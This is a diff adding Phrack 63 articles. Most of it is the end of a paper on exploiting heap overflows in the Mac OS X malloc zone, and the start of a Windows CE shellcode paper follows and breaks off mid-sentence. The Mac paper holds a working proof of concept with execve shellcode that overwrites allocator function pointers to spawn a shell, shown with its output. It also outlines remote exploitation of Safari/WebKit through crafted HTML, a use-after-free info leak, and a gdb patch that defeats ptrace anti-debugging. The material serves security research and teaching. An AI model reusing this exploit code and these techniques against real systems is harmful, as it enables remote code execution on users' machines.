+As you can see, the zone struct contains function pointers for each of the
+memory allocation / deallocation functions. This should give you a 
+pretty good idea of how we can control execution after an overflow.
+
+Most of these functions are pretty self explanatory, the malloc,calloc,
+valloc free, and realloc function pointers perform the same 
+functionality they do on Linux/BSD. 
+
+The size function is used to return the size of the memory allocated. The 
+destroy() function is used to destroy the entire zone and free all memory
+allocated in it. 
+
+The batch_malloc and batch_free functions to the best of my understanding
+are used to allocate (or deallocate) several blocks of the same size. 
+
+NOTE:
+The malloc_good_size() function is used to return the size of the buffer
+after rounding has occurred. An interesting note about this function is 
+that it contains the same wrap mentioned in  5.1.
+
+	printf("0x%x\n",malloc_good_size(0xffffffff));
+
+Will print 0x1000 on Mac OS X 10.4 (Tiger).
+	
+----[ 2.3 - Blocks. 
+
+Allocation of blocks occurs in different ways depending on the size of the
+memory required. The size of all blocks allocated is always paragraph 
+aligned (a multiple of 16). Therefore an allocation of less than 16 will 
+always return 16, an allocation of 20 will return 32, etc. 
+
+The szone_t struct contains two pointers, for tiny and small block 
+allocation. These are shown below:
+
+	tiny_region_t       *tiny_regions;
+	small_region_t      *small_regions;
+
+Memory allocations which are less than around 500 bytes in size
+fall into the "tiny" range. These allocations are allocated from a  
+pool of vm_allocate()'ed regions of memory. Each of these regions 
+consists of a 1MB, (in 32-bit mode), or 2MB, (in 64-bit mode) heap. 
+Following this is some meta-data about the region. Regions are ordered 
+by ascending block size. When memory is deallocated it is added back to 
+the pool. 
+
+
+Free blocks contain the following meta-data: 
+
+(all fields are sizeof(void *) in size, except for "size" which is 
+sizeof(u_short)). Tiny sized buffers are instead aligned to 0x10 bytes)
+
+- checksum
+- previous
+- next
+- size 
+
+The size field contains the quantum count for the region. A quantum represents 
+the size of the allocated blocks of memory within the region.
+
+Allocations of which size falls in the range between 500 bytes and four 
+virtual pages in size (0x4000) fall into the "small" category.
+Memory allocations of "small" range sized blocks, are allocated from a 
+pool of small regions, pointed to by the "small_regions" pointer in the 
+szone_t struct. Again this memory is pre-allocated with the vm_allocate()
+function. Each "small" region consists of an 8MB heap, followed by the 
+same meta-data as tiny regions.
+
+Tiny and small allocations are not always guaranteed to be page aligned.
+If a block is allocated which is less than a single virtual page size then
+obviously the block cannot be aligned to a page. 
+
+Large block allocations (allocations over four vm pages in size), are 
+handled quite differently to the small and tiny blocks. When a large
+block is requested, the malloc() routine uses vm_allocate() to obtain the 
+memory required. Larger memory allocations occur in the higher memory of
+the heap. This is useful in the "destroying the heap" technique, outlined 
+in this paper. Large blocks of memory are allocated in multiples of 4096. 
+This is the size of a virtual memory page. Because of this, large memory
+allocations are always guaranteed to be page-aligned.
+
+----[ 2.4 - Heap initialization. 
+
+As you can see below, the malloc() function is merely a wrapper around
+the malloc_zone_malloc() function. 
+
+ void *malloc(size_t size) 
+ {
+   void  *retval;
+	    
+   retval = malloc_zone_malloc(inline_malloc_default_zone(), size);
+   if (retval == NULL) 
+     {
+	errno = ENOMEM;
+     }
+   return retval;
+ }
+ 
+It uses the inline_malloc_default_zone() function to pass the appropriate
+zone to malloc_zone_malloc(). If malloc() is being called for the first 
+time the inline_malloc_default_zone() function calls _malloc_initialize()
+in order to create the initial default malloc zone. 
+
+The malloc_create_zone() function is called with the values (0,0) being 
+passed in as as the start_size and flags parameters. 
+
+After this the environment variables are read in (any beginning with 
+"Malloc"), and parsed in order to set the appropriate flags.  
+
+It then calls the create_scalable_zone() function in the scalable_malloc.c 
+file. This function is really responsible for creating the szone_t struct.
+It uses the allocate_pages() function as shown below.
+
+ szone = allocate_pages(NULL, SMALL_REGION_SIZE, SMALL_BLOCKS_ALIGN, 0, \ 
+			VM_MAKE_TAG(VM_MEMORY_MALLOC));
+
+This, in turn, uses the mach_vm_allocate() mach syscall to allocate the 
+required memory to store the s_zone_t default struct. 
+
+-[Summary]:
+
+For the technique contained within this paper, the most important things 
+to note is that a szone_t struct is set up in memory. The struct contains 
+several function pointers which are used to store the address of each of 
+the appropriate allocation and deallocation functions. When a block of 
+memory is allocated which falls into the "large" category, the 
+vm_allocate() mach syscall is used to allocate the memory for this. 
+
+--[ 3 - A Sample Overflow
+
+Before we look at how to exploit a heap overflow, we will first analyze
+how the initial zone struct is laid out in the memory of a running 
+process.
+
+To do this we will use gdb to debug a small sample program. This is 
+shown below:
+
+	-[nemo@gir:~]$ cat > mtst1.c
+	#include <stdlib.h>
+
+	int main(int ac, char **av)
+	{
+		char *a = malloc(10);
+		__asm("trap");
+		char *b = malloc(10);
+	}
+
+	-[nemo@gir:~]$ gcc mtst1.c -o mtst1
+	-[nemo@gir:~]$ gdb ./mtst1
+	GNU gdb 6.1-20040303 (Apple version gdb-413)
+	(gdb) r
+	Starting program: /Users/nemo/mtst1 
+	Reading symbols for shared libraries . done
+
+Once we receive a SIGTRAP signal and return to the gdb command shell we
+can then use the command shown below to locate our initial szone_t 
+structure in the process memory. 
+
+	(gdb) x/x &initial_malloc_zones
+	0xa0010414 <initial_malloc_zones>:      0x01800000
+
+This value, as expected inside gdb, is shown to be 0x01800000. 
+If we dump memory at this location, we can see each of the fields in the 
+_malloc_zone_t_ struct as expected.
+
+NOTE: Output reformatted for more clarity. 
+
+	(gdb) x/x (long*) initial_malloc_zones
+	0x1800000:      0x00000000	// Reserved1.
+	0x1800004:      0x00000000	// Reserved2.
+	0x1800008:      0x90005e0c	// size() pointer.
+	0x180000c:      0x90003abc	// malloc() pointer.
+	0x1800010:      0x90008bc4	// calloc() pointer.
+	0x1800014:      0x9004a9f8	// valloc() pointer.
+	0x1800018:      0x900060ac	// free() pointer.
+	0x180001c:      0x90017f90	// realloc() pointer.
+	0x1800020:      0x9010efb8	// destroy() pointer.
+	0x1800024:      0x00300000	// Zone Name 
+					//("DefaultMallocZone").
+	0x1800028:      0x9010dbe8	// batch_malloc() pointer.
+	0x180002c:      0x9010e848	// batch_free() pointer.
+
+In this struct we can see each of the function pointers which are called 
+for each of the memory allocation/deallocation functions performed using
+the default zone. As well as a pointer to the name of the zone, which can
+be useful for debugging.
+
+If we change the malloc() function pointer, and continue our sample 
+program (shown below) we can see that the second call to malloc() results 
+in a jump to the specified value. (after instruction alignment).
+
+	(gdb) set *0x180000c = 0xdeadbeef
+	(gdb) jump *($pc + 4)
+	Continuing at 0x2cf8.
+
+	Program received signal EXC_BAD_ACCESS, Could not access memory.
+	Reason: KERN_INVALID_ADDRESS at address: 0xdeadbeec
+	0xdeadbeec in ?? ()
+	(gdb) 
+
+But is it really feasible to write all the way to the address 0x1800000?
+(or 0x2800000 outside of gdb). We will look into this now.
+
+First we will check the addresses various sized memory allocations are 
+given. The location of each buffer is dependant on whether the 
+allocation size falls into one of the various sized bins mentioned 
+earlier (tiny, small or large).
+
+To test the location of each of these we can simply compile and run the 
+following small c program as shown:
+
+	-[nemo@gir:~]$ cat > mtst2.c    
+	#include <stdio.h>
+	#include <stdlib.h>
+
+	int main(int ac, char **av)
+	{
+		extern *malloc_zones;
+
+		printf("initial_malloc_zones @ 0x%x\n",*malloc_zones);
+		printf("tiny:  %p\n",malloc(22));
+		printf("small: %p\n",malloc(500));
+		printf("large: %p\n",malloc(0xffffffff));
+		return 0;
+	}
+	-[nemo@gir:~]$ gcc mtst2.c -o mtst2
+	-[nemo@gir:~]$ ./mtst2 
+	initial_malloc_zones @ 0x2800000
+	tiny:  0x500160
+	small: 0x2800600
+	large: 0x26000
+
+From the output of this program we can see that it is only possible to 
+write to the initial_malloc_zones struct from a "tiny" or " large" 
+buffer. Also, in order to overwrite the function pointers contained within
+this struct we need to write a considerable amount of data completely 
+destroying sections of the zone. Thankfully many situations exist in 
+typical software which allow these criteria to be met. This is discussed
+in the final section of this paper.
+
+Now we understand the layout of the heap a little better, we can use a 
+small sample program to overwrite the function pointers contained in the 
+struct to get a shell. 
+
+The following program allocates a 'tiny' buffer of 22 bytes. It then uses
+memset() to write 'A's all the way to the pointer for malloc() in the 
+zone struct, before calling malloc().
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+
+int main(int ac, char **av)
+{
+  extern *malloc_zones;
+  char *tmp,*tinyp = malloc(22);
+
+  printf("[+] tinyp is @ %p\n",tinyp);
+  printf("[+] initial_malloc_zones is @ %p\n", *malloc_zones);			
+  printf("[+] Copying 0x%x bytes.\n",
+	  (((char *)*malloc_zones + 16) - (char *)tinyp));
+  memset(tinyp,'A', (int)(((char *)*malloc_zones + 16) - (char *)tinyp));
+
+  tmp = malloc(0xdeadbeef);
+  return 0;
+}
+
+However when we compile and run this program, an EXC_BAD_ACCESS signal is 
+received.
+
+	(gdb) r
+	Starting program: /Users/nemo/mtst3 
+	Reading symbols for shared libraries . done
+	[+] tinyp is @ 0x300120
+	[+] initial_malloc_zones is @ 0x1800000
+	[+] Copying 0x14ffef0 bytes.
+
+	Program received signal EXC_BAD_ACCESS, Could not access memory.
+	Reason: KERN_INVALID_ADDRESS at address: 0x00405000
+	0xffff9068 in ___memset_pattern () 
+
+This is due to the fact that, in between the tinyp pointer and the malloc
+function pointer we are trying to overwrite there is some unmapped memory. 
+
+In order to get past this we can use the fact that blocks of memory 
+allocated which fall into the "large" category are allocated using the 
+mach vm_allocate() syscall. 
+
+If we can get enough memory to be allocated in the large classification,
+before the overflow occurs we should have a clear path to the pointer.
+
+To illustrate this point, we can use the following code:
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <malloc.h>
+#include <string.h>
+
+char shellcode[] = // Shellcode by b-r00t, modified by nemo.
+"\x7c\x63\x1a\x79\x40\x82\xff\xfd\x39\x40\x01\xc3\x38\x0a\xfe\xf4"
+"\x44\xff\xff\x02\x39\x40\x01\x23\x38\x0a\xfe\xf4\x44\xff\xff\x02"
+"\x60\x60\x60\x60\x7c\xa5\x2a\x79\x7c\x68\x02\xa6\x38\x63\x01\x60"
+"\x38\x63\xfe\xf4\x90\x61\xff\xf8\x90\xa1\xff\xfc\x38\x81\xff\xf8"
+"\x3b\xc0\x01\x47\x38\x1e\xfe\xf4\x44\xff\xff\x02\x7c\xa3\x2b\x78"
+"\x3b\xc0\x01\x0d\x38\x1e\xfe\xf4\x44\xff\xff\x02\x2f\x62\x69\x6e"
+"\x2f\x73\x68";
+
+extern *malloc_zones;
+
+int    main(int ac, char **av)
+{
+ char  *tmp, *tmpr;
+ int   a=0 , *addr;
+
+ while ((tmpr = malloc(0xffffffff)) <= (char *)*malloc_zones);
+				
+ // small buffer
+ addr = malloc(22);              
+ printf("[+] malloc_zones (first zone) @ 0x%x\n", *malloc_zones);
+ printf("[+] addr @ 0x%x\n",addr);
+
+ if ((unsigned int) addr < *malloc_zones) 
+ {
+    printf("[+] addr + %u = 0x%x\n",
+	   *malloc_zones - (int) addr, *malloc_zones);
+    exit(1);
+ }
+
+ printf("[+] Using shellcode @ 0x%x\n",&shellcode);
+
+ for (a = 0; 
+      a <= ((*malloc_zones - (int) addr) + sizeof(malloc_zone_t)) / 4;
+      a++)
+   addr[a] = (int) &shellcode[0];
+
+ printf("[+] finished memcpy()\n");
+ 
+ tmp = malloc(5);        // execve()
+
+}
+
+This code allocates enough "large" blocks of memory (0xffffffff) with 
+which to plow a clear path to the function pointers. It then copies 
+the address of the shellcode into memory all the way through the zone
+before overwriting the function pointers in the szone_t struct. Finally a
+call to malloc() is made in order to trigger the execution of the 
+shellcode.
+
+As you can see below, this code function as we'd expect and our 
+shellcode is executed.
+
+	-[nemo@gir:~]$ ./heaptst 
+	[+] malloc_zones (first zone) @ 0x2800000
+	[+] addr @ 0x500120
+	[+] addr + 36699872 = 0x2800000
+	[+] Using shellcode @ 0x3014
+	[+] finished memcpy()
+	sh-2.05b$ 
+
+This method has been tested on Apple's OS X version 10.4.1 (Tiger).
+
+--[ 4 - A Real Life Example
+
+The default web browser on OS X (Safari) as well as the mail client 
+(Mail.app), Dashboard and almost every other application on OS X which 
+requires web parsing functionality achieve this through a library 
+which Apple call "WebKit". (2)
+
+This library contains many bugs, many of which are exploitable using this
+technique. Particular attention should be payed to the code which renders 
+<TABLE></TABLE> blocks ;) 
+
+Due to the nature of HTML pages an attacker is presented with 
+opportunities to control the heap in a variety of ways before actually 
+triggering the exploit. In order to use the technique described in this
+paper to exploit these bugs we can craft some HTML code, or an image 
+file, to perform many large allocations and therefore cleaving a path 
+to our function pointers. We can then trigger one of the numerous 
+overflows to write the address of our shellcode into the function 
+pointers before waiting for a shell to be spawned.
+
+One of the bugs which i have exploited using this particular method 
+involves an unchecked length being used to allocate and fill an object in
+memory with null bytes (\x00). 
+
+If we manage to calculate the write so that it stops mid way through one 
+of our function pointers in the szone_t struct, we can effectively 
+truncate the pointer causing execution to jump elsewhere.
+
+The first step to exploiting this bug, is to fire up the debugger (gdb)
+and look at what options are available to us.
+
+Once we have Safari loaded up in our debugger, the first thing we need
+to check for the exploit to succeed is that we have a clear path to the 
+initial_malloc_zones struct. To do this in gdb we can put a breakpoint 
+on the return statement in the malloc() function. 
+
+We use the command "disas malloc" to view the assembly listing for the 
+malloc function. The end of this listing is shown below:
+
+	.....
+
+	0x900039dc <malloc+1464>:       lwz     r0,8(r1)
+	0x900039e0 <malloc+1468>:       lmw     r24,-32(r1)
+	0x900039e4 <malloc+1472>:       lwz     r11,4(r1)
+	0x900039e8 <malloc+1476>:       mtlr    r0
+	0x900039ec <malloc+1480>:       .long 0x7d708120
+	0x900039f0 <malloc+1484>:       blr
+	0x900039f4 <malloc+1488>:       .long 0x0
+
+The "blr" instruction shown at line 0x900039f0 is the "branch to link 
+register" instruction. This instruction is used to return from malloc().
+
+Functions in OS X on PPC architecture pass their return value back to the 
+calling function in the "r3" register. In order to make sure that the 
+malloc()'ed addresses have reached the address of our zone struct we can 
+put a breakpoint on this instruction, and output the value which was 
+returned.
+
+We can do this with the gdb commands shown below.
+
+	(gdb) break *0x900039f0 
+	Breakpoint 1 at 0x900039f0
+	(gdb) commands
+	Type commands for when breakpoint 1 is hit, one per line.
+	End with a line saying just "end".
+	>i r r3
+	>cont
+	>end
+
+We can now continue execution and receive a running status of all 
+allocations which occur in our program. This way we can see when our 
+target is reached.
+
+The "heap" tool can also be used to see the sizes and numbers of each
+allocation.
+
+There are several methods which can be used to set up the heap 
+correctly for exploitation. One method, suggested by andrewg, is to use a
+.png image in order to control the sizes of allocations which occur. 
+Apparently this method was learn from zen-parse when exploiting a 
+mozilla bug in the past.
+
+The method which i have used is to create an HTML page which repeatedly
+triggers the overflow with various sizes. After playing around with 
+this for a while, it was possible to regularly allocate enough memory 
+for the overflow to occur.
+
+Once the limit is reached, it is possible to trigger the overflow in a
+way which overwrites the first few bytes in any of the pointers in the 
+szone_t struct. 
+
+Because of the big endian nature of PPC architecture (by default. it can 
+be changed.) the first few bytes in the pointer make all the difference 
+and our truncated pointer will now point to the .TEXT segment. 
+
+The following gdb output shows our initial_malloc_zones struct after the 
+heap has been smashed.
+
+	(gdb) x/x (long )*&initial_malloc_zones
+	0x1800000:      0x00000000	// Reserved1.
+	(gdb)
+	0x1800004:      0x00000000	// Reserved2.
+	(gdb)
+	0x1800008:      0x00000000	// size() pointer.
+	(gdb)
+	0x180000c:      0x00003abc	// malloc() pointer.
+	(gdb)		   ^^ smash stopped here.
+	0x1800010:      0x90008bc4
+
+As you can see, the malloc() pointer is now pointing to somewhere in the
+.TEXT segment, and the next call to malloc() will take us there. We can 
+use gdb to view the instructions at this address. As you can see in the 
+following example.
+
+	(gdb) x/2i 0x00003abc
+	0x3abc: lwz     r4,0(r31)
+	0x3ac0: bl      0xd686c <dyld_stub_objc_msgSend>
+
+Here we can see that the r31 register must be a valid memory address for 
+a start following this the dyld_stub_objc_msgSend() function is called 
+using the "bl" (branch updating link register) instruction. Again we can 
+use gdb to view the instructions in this function.
+
+	(gdb) x/4i 0xd686c
+	0xd686c <dyld_stub_objc_msgSend>:       lis     r11,14
+	0xd6870 <dyld_stub_objc_msgSend+4>:     lwzu    r12,-31732(r11)
+	0xd6874 <dyld_stub_objc_msgSend+8>:     mtctr   r12
+	0xd6878 <dyld_stub_objc_msgSend+12>:    bctr
+
+We can see in these instructions that the r11 register must be a valid
+memory address. Other than that the final two instructions (0xd6874 
+and 0xd6878) move the value in the r12 register to the control 
+register, before branching to it. This is the equivalent of jumping to 
+a function pointer in r12. Amazingly this code construct is exactly 
+what we need. 
+
+So all that is needed to exploit this vulnerability now, is to find 
+somewhere in the binary where the r12 register is controlled by the user,
+directly before the malloc function is called. Although this isn't 
+terribly easy to find, it does exist.
+
+However, if this code is not reached before one of the pointers 
+contained on the (now smashed) heap is used the program will most 
+likely crash before we are given a chance to steal execution flow. Because
+of this fact, and because of the difficult nature of predicting the exact 
+values with which to smash the heap, exploiting this vulnerability can be 
+very unreliable, however it definitely can be done.
+
+	Program received signal EXC_BAD_ACCESS, Could not access memory.
+	Reason: KERN_INVALID_ADDRESS at address: 0xdeadbeec
+	0xdeadbeec in ?? ()
+	(gdb)
+
+An exploit for this vulnerability means that a crafted email or website 
+is all that is needed to remotely exploit an OS X user.
+
+Apple have been contacted about a couple of these bugs and are currently
+in the process of fixing them.
+
+The WebKit library is open source and available for download, apparently 
+it won't be too long before Nokia phones use this library for their web 
+applications. [5]
+
+--[ 5 - Miscellaneous
+
+This section shows a couple of situations / observations regarding the 
+memory allocator which did not fit in to any of the other sections.
+
+----[ 5.1 - Wrap-around Bug.
+
+The examples in this paper allocated the value 0xffffffff. However 
+this amount is not technically feasible for a malloc implementation 
+to allocate each time.
+
+The reason this works without failure is due to a subtle bug which 
+exists in the Darwin kernel's vm_allocate() function.
+
+This function attempts to round the desired size it up to the closest 
+page aligned value. However it accomplishes this by using the 
+vm_map_round_page() macro (shown below.)
+
+	#define PAGE_MASK (PAGE_SIZE - 1)
+	#define PAGE_SIZE vm_page_size
+	#define vm_map_round_page(x) (((vm_map_offset_t)(x) + \ 
+	PAGE_MASK) & ~((signed)PAGE_MASK))
+
+Here we can see that the page size minus one is simply added to the value 
+which is to be rounded before being bitwise AND'ed with the reverse of
+the PAGE_MASK.
+
+The effect of this macro when rounding large  values can be illustrated 
+using the following code:
+
+	#include <stdio.h>
+
+	#define PAGEMASK 0xfff
+
+	#define vm_map_round_page(x) ((x + PAGEMASK) & ~PAGEMASK)
+
+	int main(int ac, char **av)
+	{
+		printf("0x%x\n",vm_map_round_page(0xffffffff));
+	}
+
+When run (below) it can be seen that the value 0xffffffff will be rounded
+to 0.
+	-[nemo@gir:~]$ ./rounding
+	0x0
+
+Directly below the rounding in vm_allocate() is performed there is a check
+to make sure the rounded size is not zero. If it is zero then the size of
+a page is added to it. Leaving only a single page allocated.
+
+        map_size = vm_map_round_page(size);              
+	if (map_addr == 0)
+		map_addr += PAGE_SIZE;
+
+The code below demonstrates the effect of this on two calls to malloc().
+
+	#include <stdio.h>
+	#include <stdlib.h>
+
+	int main(int ac, char **av)
+	{
+		char *a = malloc(0xffffffff);
+		char *b = malloc(0xffffffff);
+
+		printf("B - A: 0x%x\n", b - a);
+
+		return 0;
+	}
+
+When this program is compiled and run (below) we can see that although the
+programmer believes he/she now has a 4GB buffer only a single page has
+been allocated.
+
+	-[nemo@gir:~]$ ./ovrflw
+	B - A: 0x1000
+
+This means that most situations where a user specified length can be 
+passed to the malloc() function, before being used to copy data, are 
+exploitable.
+
+This bug was pointed out to me by duke.
+
+----[ 5.2 - Double free().
+
+Bertrand's allocator keeps track of the addresses which are currently
+allocated. When a buffer is free()'ed the find_registered_zone() function
+is used to make sure that the address which is requested to be free()'ed 
+exists in one of the zones. This check is shown below.
+
+void		free(void *ptr) 
+{
+ malloc_zone_t       *zone;
+
+ if (!ptr) return;
+ 
+ zone = find_registered_zone(ptr, NULL);
+ if (zone) 
+  {
+     malloc_zone_free(zone, ptr);
+  } 
+  else 
+  {
+     malloc_printf("***  Deallocation of a pointer not malloced: %p; "
+                   "This could be a double free(), or free() called "
+		   "with the middle of an allocated block; "
+		   "Try setting environment variable MallocHelp to see "
+		   "tools that help to debug\n", ptr);
+     if (malloc_free_abort) abort();
+  }
+}
+
+
+This means that an address free()'ed twice (double free) will not 
+actually be free()'ed the second time. Making it hard to exploit 
+double free()'s in this way.
+
+However, when a buffer is allocated of the same size as the previous 
+buffer and free()'ed, but the pointer to the free()'ed buffer still 
+exists and is used an exploitable condition can occur.
+
+The small sample program below shows a pointer being allocated and 
+free()ed and then a second pointer being allocated of the same size. Then
+free()ed twice.
+
+	#include <stdio.h>
+	#include <stdlib.h>
+	#include <string.h>
+
+	int main(int ac, char **av)
+	{
+		char *b,*a  = malloc(11);
+
+		printf("a: %p\n",a);
+		free(a);
+		b  = malloc(11);
+		printf("b: %p\n",b);
+		free(b);
+		printf("b: %p\n",a);
+		free(b);
+		printf("a: %p\n",a);
+
+		return 0;
+	}
+
+
+When we compile and run it, as shown below, we can see that pointer "a"
+still points to the same address as "b", even after it was free()'ed. 
+If this condition occurs and we are able to write to,or read from,
+pointer "a", we may be able to exploit this for an info leak, or gain
+control of execution.
+
+	-[nemo@gir:~]$ ./dfr
+	a: 0x500120
+	b: 0x500120
+	b: 0x500120
+	tst(3575) malloc: *** error for object 0x500120: double free
+	tst(3575) malloc: *** set a breakpoint in szone_error to debug
+	a: 0x500120
+
+I have written a small sample program to explain more clearly how this 
+works. The code below reads a username and password from the user.
+It then compares password to one stored in the file ".skrt". If this 
+password is the same, the secret code is revealed. Otherwise an error is
+printed informing the user that the password was incorrect.
+
+	#include <stdio.h>
+	#include <stdlib.h>
+	#include <string.h>
+	#include <unistd.h>
+
+	#define PASSWDFILE ".skrt"
+
+	int main(int ac, char **av)
+	{
+		char *user = malloc(128 + 1);
+		char *p,*pass = "" ,*skrt = NULL;
+		FILE *fp;
+
+		printf("login: ");
+		fgets(user,128,stdin);
+		if (p = strchr(user,'\n'))
+			*p = '\x00';
+
+		// If the username contains "admin_", exit.
+		if(strstr(user,"admin_")) 
+		{
+			printf("Admin user not allowed!\n");
+			free(user);
+			fflush(stdin);
+			goto exit;
+		}
+
+		pass = getpass("Enter your password: ");
+
+	exit:
+		if ((fp = fopen(PASSWDFILE,"r")) == NULL) 
+		{
+			printf("Error loading password file.\n");
+			exit(1);
+		}
+
+		skrt = malloc(128 + 1);
+
+		if (!fgets(skrt,128,fp)) 
+		{
+			exit(1);
+		}
+
+		if (p = strchr(skrt,'\n'))
+			*p = '\x00';
+
+		if (!strcmp(pass,skrt)) 
+		{
+			printf("The combination is 2C,4B,5C\n");
+		} 
+		else 
+		{
+			printf("Password Rejected for %s, please try again\n");
+				user);
+		}
+
+		fclose(fp);
+		return 0;
+	}
+
+When we compile the program and enter an incorrect password we see the 
+following message:
+
+	-[nemo@gir:~]$ ./dfree
+	login: nemo
+	Enter your password:
+	Password Rejected for nemo, please try again.
+
+However, if the "admin_" string is detected  in the string, the user 
+buffer is free()'ed. The skrt buffer is then returned from malloc() 
+pointing to the same allocated block of memory as the user pointer. 
+This would normally be fine however the user buffer is used in the 
+printf() function call at the end of the function. Because the user 
+pointer still points to the same memory as skrt this causes an 
+info-leak and the secret password is printed, as seen below:
+
+	-[nemo@gir:~]$ ./dfree
+	login: admin_nemo
+	Admin user not allowed!
+	Password Rejected for secret_password, please try again.
+
+We can then use this password to get the combination:
+
+	-[nemo@gir:~]$ ./dfree
+	login: nemo
+	Enter your password:
+	The combination is 2C,4B,5C
+
+----[ 5.3 - Beating ptrace()
+
+Safari uses the ptrace() syscall to try and stop evil hackers from 
+debugging their proprietary code. ;). The extract from the 
+man-page below shows a ptrace() flag which can be used to stop people 
+being able to debug your code.
+
+PT_DENY_ATTACH
+	   This request is the other operation used by the traced
+	   process; it allows a process that is not currently being
+	   traced to deny future traces by its parent.  All other
+	   arguments are ignored.  If the process is currently being
+	   traced, it will exit with the exit status of ENOTSUP; oth-
+	   erwise, it sets a flag that denies future traces.  An
+	   attempt by the parent to trace a process which has set this
+	   flag will result in a segmentation violation in the parent.
+
+There are a couple of ways to get around this check (which i am aware of).
+The first of these is to patch your kernel to stop the PT_DENY_ATTACH call
+from doing anything. This is probably the best way, however involves the 
+most effort.
+
+The method which we will use now to look at Safari is to start up gdb and
+put a breakpoint on the ptrace() function. This is shown below:
+
+	-[nemo@gir:~]$ gdb /Applications/Safari.app/Contents/MacOS/Safari
+	GNU gdb 6.1-20040303 (Apple version gdb-413) 
+	(gdb) break ptrace
+	Breakpoint 1 at 0x900541f4
+
+We then run the program, and wait until the breakpoint is hit. When our 
+breakpoint is triggered, we use the x/10i $pc command (below) to view the
+next 10 instructions in the function.
+
+	(gdb) r
+	Starting program: /Applications/Safari.app/Contents/MacOS/Safari
+	Reading symbols for shared libraries .................... done
+
+	Breakpoint 1, 0x900541f4 in ptrace ()
+	(gdb) x/10i $pc
+	0x900541f4 <ptrace+20>: addis   r8,r8,4091
+	0x900541f8 <ptrace+24>: lwz     r8,7860(r8)
+	0x900541fc <ptrace+28>: stw     r7,0(r8)
+	0x90054200 <ptrace+32>: li      r0,26
+	0x90054204 <ptrace+36>: sc
+	0x90054208 <ptrace+40>: b       0x90054210 <ptrace+48>
+	0x9005420c <ptrace+44>: b       0x90054230 <ptrace+80>
+	0x90054210 <ptrace+48>: mflr    r0
+	0x90054214 <ptrace+52>: bcl-    20,4*cr7+so,0x90054218 
+	0x90054218 <ptrace+56>: mflr    r12
+
+At line 0x90054204 we can see the instruction "sc" being executed. This 
+is the instruction which calls the syscall itself. This is similar to 
+int 0x80 on a Linux platform, or sysenter/int 0x2e in windows. 
+
+In order to stop the ptrace() syscall from occurring we can simply 
+replace this instruction in memory with a nop (no operation) 
+instruction. This way the syscall will never take place and we can 
+debug without any problems.
+
+To patch this instruction in gdb we can use the command shown below and 
+continue execution.
+
+	(gdb) set *0x90054204 = 0x60000000
+	(gdb) continue
+
+--[ 6 - Conclusion
+
+Although the technique which was described in this paper seem rather 
+specific, the technique is still valid and exploitation of heap bugs in 
+this way is definitely possible.
+
+When you are able to exploit a bug in this way you can quickly turn a 
+complicated bug into the equivalent of a simple stack smash (3).
+
+At the time of writing this paper, no protection schemes for the heap 
+exist for Mac OS X which would stop this technique from working. (To my 
+knowledge).
+
+On a side note, if anyone works out why the initial_malloc_zones struct is 
+always located at 0x2800000 outside of gdb and 0x1800000 inside i would 
+appreciate it if you let me know.
+
+I'd like to say thanks to my boss Swaraj from Suresec LTD for giving me 
+time to research the things which i enjoy so much.
+
+I'd also like to say hi to all the guys at Feline Menace, as well as 
+pulltheplug.org/#social and the Ruxcon team. I'd also like to thank the 
+Chelsea for providing the AU felinemenace guys with buckets of corona to
+fuel our hacking. Thanks as well to duke for pointing out the vm_allocate() 
+bug and ilja for discussing all of this with me on various occasions.
+
+"Free wd jail mitnick!" 
+
+--[ 7 - References
+
+1) Apple Memory Usage performance Guidelines:
+	- http://developer.apple.com/documentation/Performance/Conceptual/
+		ManagingMemory/Articles/MemoryAlloc.html
+
+2) WebKit:
+	- http://webkit.opendarwin.org/
+
+3) Smashing the stack for fun and profit:
+	- http://www.phrack.org/show.php?p=49&a=14
+
+4) Mac OS X Assembler Guide
+	- http://developer.apple.com/documentation/DeveloperTools/
+		Reference/Assembler/index.html
+
+5) Slashdot - Nokia Using WebKit
+	- http://apple.slashdot.org/article.pl?sid=05/06/13/1158208
+
+6) Darwin Source. 
+	- http://www.opensource.apple.com/darwinsource/curr.version.number
+
+7) Bug Me Not 
+	- http://www.bugmenot.com
+
+8) Open Darwin 
+	- http://www.opendarwin.org
+
+|=[ EOF ]=--------------------------------------------------------------=|
diff --git a/phrack63/6.txt b/phrack63/6.txt
new file mode 100644
index 0000000..cbec0ec
--- /dev/null
+++ b/phrack63/6.txt
@@ -0,0 +1,1433 @@
+                           ==Phrack Inc.==
+
+              Volume 0x0b, Issue 0x3f, Phile #0x06 of 0x14
+
+|=----------------------------------------------------------------------=|
+|=----------------------=[ Hacking Windows CE ]=------------------------=|
+|=----------------------------------------------------------------------=|
+|=----------------------=[ san <san@xfocus.org> ]=----------------------=|
+
+--[ Contents
+
+    1 - Abstract
+
+    2 - Windows CE Overview
+
+    3 - ARM Architecture
+
+    4 - Windows CE Memory Management
+
+    5 - Windows CE Processes and Threads
+
+    6 - Windows CE API Address Search Technology
+
+    7 - The Shellcode for Windows CE
+
+    8 - System Call
+
+    9 - Windows CE Buffer Overflow Exploitation
+
+   10 - About Decoding Shellcode
+
+   11 - Conclusion
+
+   12 - Greetings
+
+   13 - References
+
+
+--[ 1 - Abstract
+
+The network features of PDAs and mobiles are becoming more and more
+powerful, so their related security problems are attracting more and more
+attentions. This paper will show a buffer overflow exploitation example
+in Windows CE. It will cover knowledges about ARM architecture, memory
+management and the features of processes and threads of Windows CE. It
+also shows how to write a shellcode in Windows CE, including knowledges
+about decoding shellcode of Windows CE with ARM processor.
+
+
+--[ 2 - Windows CE Overview
+
+Windows CE is a very popular embedded operating system for PDAs and
+mobiles. As the name, it's developed by Microsoft. Because of the similar
+APIs, the Windows developers can easily develop applications for Windows
+CE. Maybe this is an important reason that makes Windows CE popular.
+Windows CE 5.0 is the latest version, but Windows CE.net(4.2) is the most
+useful version, and this paper is based on Windows CE.net.
+
+For marketing reason, Windows Mobile Software for Pocket PC and Smartphone
+are considered as independent products, but they are also based on the
+core of Windows CE.
+
+By default, Windows CE is in little-endian mode and it supports several
+processors.
+
+
+--[ 3 - ARM Architecture
+
+ARM processor is the most popular chip in PDAs and mobiles, almost all of
+the embedded devices use ARM as CPU. ARM processors are typical RISC
+processors in that they implement a load/store architecture. Only load and
+store instructions can access memory. Data processing instructions operate
+on register contents only.
+
+There are six major versions of ARM architecture. These are denoted by
+the version numbers 1 to 6.
+
+ARM processors support up to seven processor modes, depending on the
+architecture version. These modes are: User, FIQ-Fast Interrupt Request,
+IRQ-Interrupt Request, Supervisor, Abort, Undefined and System. The System
